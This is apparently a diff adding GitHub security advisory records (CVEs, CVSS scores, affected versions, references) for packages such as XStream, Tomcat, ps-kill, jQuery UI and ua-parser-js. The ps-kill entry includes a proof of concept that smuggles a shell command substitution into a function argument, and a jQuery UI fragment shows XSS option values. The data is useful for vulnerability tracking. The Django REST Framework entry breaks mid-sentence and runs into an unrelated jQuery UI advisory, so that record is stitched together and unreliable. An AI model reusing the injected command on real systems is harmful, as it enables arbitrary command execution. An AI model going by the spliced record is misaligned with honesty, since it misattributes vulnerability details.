+Avoid running Hollow in configurations that share a filesystem with less-trusted processes. May be fixed in a future release.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.netflix.hollow:hollow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-j83w-7qr9-wv86'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28099'}, {'type': 'WEB', 'url': 'https://github.com/Netflix/hollow/issues/502'}, {'type': 'WEB', 'url': 'https://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-001.md'}]","{'cwe_ids': ['CWE-377'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:39:18Z', 'nvd_published_at': '2021-03-23T21:15:00Z'}"
+1.4.0,GHSA-qwwr-qc2p-6283,2021-10-21T21:19:32Z,2021-03-22T16:57:07Z,,['CVE-2018-14550'],Out-of-bounds write in libpng,An issue has been found in third-party PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow in the function get_token in pnm2png.c in pnm2png.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'libpng'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.37'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.6.35'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-14550'}, {'type': 'WEB', 'url': 'https://github.com/glennrp/libpng/issues/246'}, {'type': 'WEB', 'url': 'https://github.com/fouzhe/security/tree/master/libpng#stack-buffer-overflow-in-png2pnm-in-function-get_token'}, {'type': 'PACKAGE', 'url': 'https://github.com/glennrp/libpng'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201908-02'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20221028-0001/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-UPSTREAM-LIBPNG-1043612'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T15:41:48Z', 'nvd_published_at': '2019-07-10T12:15:00Z'}"
+1.4.0,GHSA-5rq8-3wvf-wrfg,2021-03-18T22:10:02Z,2021-03-29T20:59:01Z,,['CVE-2019-0933'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0933'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/1a550c67b33b27675c0553152cabd09e4ffe3abf'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0933'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:10:02Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-jgwr-3qm3-26f3,2022-08-22T19:40:41Z,2021-03-19T20:11:13Z,,['CVE-2021-25329'],Potential remote code execution in Apache Tomcat,"The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-M1'}, {'fixed': '10.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.41'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.5.61'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.108'}]}], 'database_specific': {'last_known_affected_version_range': '< 7.0.107'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25329'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/6d66e99ef85da93e4d2c2a536ca51aa3418bfaf4'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r11ce01e8a4c7269b88f88212f21830edf73558997ac7744f37769b77@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r732b2ca289dc02df2de820e8775559abd6c207f159e39f559547a085@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a2ac0e476dbfc1e6440b09dcc782d444ad635d6da26f0284725a5dc@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb51ccd58b2152fc75125b2406fc93e04ca9d34e737263faa6ff0f41f@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-34'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210409-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4891'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/01/2'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T20:10:56Z', 'nvd_published_at': '2021-03-01T12:15:00Z'}"
+1.4.0,GHSA-5wqj-f379-6jh4,2021-03-16T01:08:14Z,2021-03-19T21:19:47Z,,['CVE-2020-28426'],Command injection in kill-process-on-port,All versions of package kill-process-on-port are vulnerable to Command Injection via a.getProcessPortId.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'kill-process-on-port'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28426'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-KILLPROCESSONPORT-1055458'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T01:08:14Z', 'nvd_published_at': '2021-02-01T16:15:00Z'}"
+1.4.0,GHSA-hvv8-336g-rx3m,2023-03-09T21:21:55Z,2021-03-22T23:28:01Z,,['CVE-2021-21342'],A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host,"### Impact
+The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21342](https://x-stream.github.io/CVE-2021-21342.html).
+
+### Credits
+钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-hvv8-336g-rx3m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21342'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21342.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-502', 'CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:23:33Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-qpfq-ph7r-qv6f,2022-02-08T21:32:28Z,2021-03-22T23:29:00Z,,['CVE-2021-21347'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact
+The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21347](https://x-stream.github.io/CVE-2021-21347.html).
+
+### Credits
+The vulnerability was discovered and reported by threedr3am.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-qpfq-ph7r-qv6f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21347'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21347.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:25:22Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-7qmm-q394-fmch,2023-09-05T23:01:21Z,2021-03-19T21:19:29Z,,['CVE-2021-23355'],Command Injection in ps-kill,"This affects all versions of package ps-kill. If (attacker-controlled) user input is given to the kill function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization in the index.js file.
+
+PoC (provided by reporter):
+```js
+var ps_kill = require('ps-kill');
+ps_kill.kill('$(touch success)', function() {});
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ps-kill'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23355'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PSKILL-1078529'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T22:05:22Z', 'nvd_published_at': '2021-03-15T17:15:00Z'}"
+1.4.0,GHSA-9824-rp6m-xx9w,2021-03-18T22:17:02Z,2021-03-29T20:59:04Z,,['CVE-2019-0989'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0991, CVE-2019-0992, CVE-2019-0993, CVE-2019-1002, CVE-2019-1003, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0989'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/e0ce3f01c83c53f93e7299d7c8b389b17084aa1f'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0989'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:17:02Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}"
+1.4.0,GHSA-w5hr-jm4j-9jvq,2022-05-03T03:42:06Z,2021-03-02T02:57:23Z,,['CVE-2021-26119'],Sandbox escape through template_object in smarty,Sandbox protection could be bypassed through access to an internal Smarty object that should have been blocked. Sites that rely on [Smarty Security features](https://www.smarty.net/docs/en/advanced.features.tpl) should upgrade as soon as possible. Please upgrade to 3.1.39 or higher.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'smarty/smarty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.39'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/smarty-php/smarty/security/advisories/GHSA-w5hr-jm4j-9jvq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26119'}, {'type': 'PACKAGE', 'url': 'https://github.com/smarty-php/smarty/'}, {'type': 'WEB', 'url': 'https://github.com/smarty-php/smarty/blob/master/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00004.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00014.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202105-06'}, {'type': 'WEB', 'url': 'https://srcincite.io/blog/2021/02/18/smarty-template-engine-multiple-sandbox-escape-vulnerabilities.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5151'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-02T02:55:01Z', 'nvd_published_at': '2021-02-22T02:15:00Z'}"
+1.4.0,GHSA-fx83-3ph3-9j2q,2023-08-31T16:40:38Z,2021-03-19T21:32:47Z,,['CVE-2020-25626'],Cross-site Scripting (XSS) in Django REST Framework,"A flaw was found in Django REST Framework versions before 3.12.0 and before 3.11.2. When using the browseable API viewer, Django REST Framework fails to properly escape certain strings that can come from user input. This allows a user who can control those strings to inject malicious "",
+ currentText: """",
+ prevText: """",
+ nextText: """",
+ buttonText: """",
+ appendText: """",
+} );
+```
+will call `doEvilThing` with 6 different parameters coming from all `*Text` options.
+
+### Patches
+The issue is fixed in jQuery UI 1.13.0. The values passed to various `*Text` options are now always treated as pure text, not HTML.
+
+### Workarounds
+A workaround is to not accept the value of the `*Text` options from untrusted sources.
+
+### For more information
+If you have any questions or comments about this advisory, search for a relevant issue in [the jQuery UI repo](https://github.com/jquery/jquery-ui/issues). If you don't find an answer, open a new issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:jquery-ui'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-ui-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery.UI.Combined'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/security/advisories/GHSA-j7qv-pgf6-hvh4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41183'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery-ui/pull/1953'}, {'type': 'WEB', 'url': 'https://blog.jqueryui.com/2021/10/jquery-ui-1-13-0-released/'}, {'type': 'WEB', 'url': 'https://bugs.jqueryui.com/ticket/15284'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery-ui'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HVKIOWSXL2RF2ULNAP7PHESYCFSZIJE3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NXIUUBRVLA4E7G7MMIKCEN75YN7UFERW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O74SXYY7RGXREQDQUDQD4BPJ4QQTD2XQ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGSY236PYSFYIEBRGDERLA7OSY6D7XL4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SNXA7XRKGINWSUIPIZ6ZBCTV6N3KSHES/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211118-0004/'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-contrib-2022-004'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-001'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-002'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2022-09'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T22:06:45Z', 'nvd_published_at': '2021-10-26T15:15:00Z'}"
+1.4.0,GHSA-pjwm-rvh2-c87w,2023-07-28T15:38:48Z,2021-10-22T20:38:14Z,,[],Embedded malware in ua-parser-js,"The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold.
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ua-parser-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.29'}, {'fixed': '0.7.30'}]}], 'versions': ['0.7.29']}, {'package': {'ecosystem': 'npm', 'name': 'ua-parser-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '0.8.1'}]}], 'versions': ['0.8.0']}, {'package': {'ecosystem': 'npm', 'name': 'ua-parser-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.1'}]}], 'versions': ['1.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/faisalman/ua-parser-js/issues/536'}, {'type': 'WEB', 'url': 'https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-949772496'}, {'type': 'PACKAGE', 'url': 'https://github.com/faisalman/ua-parser-js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/ua-parser-js'}]","{'cwe_ids': ['CWE-829', 'CWE-912'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-22T20:37:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w729-7633-2fw5,2021-10-29T13:51:56Z,2021-10-27T18:52:06Z,,['CVE-2021-40865'],Deserialization of Untrusted Data leading to Remote Code Execution in Apache Storm,An Unsafe Deserialization vulnerability exists in the worker services of the Apache Storm supervisor server allowing pre-auth Remote Code Execution (RCE). Apache Storm 2.2.x users should upgrade to version 2.2.1 or 2.3.0. Apache Storm 2.1.x users should upgrade to version 2.1.1. Apache Storm 1.x users should upgrade to version 1.2.4,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 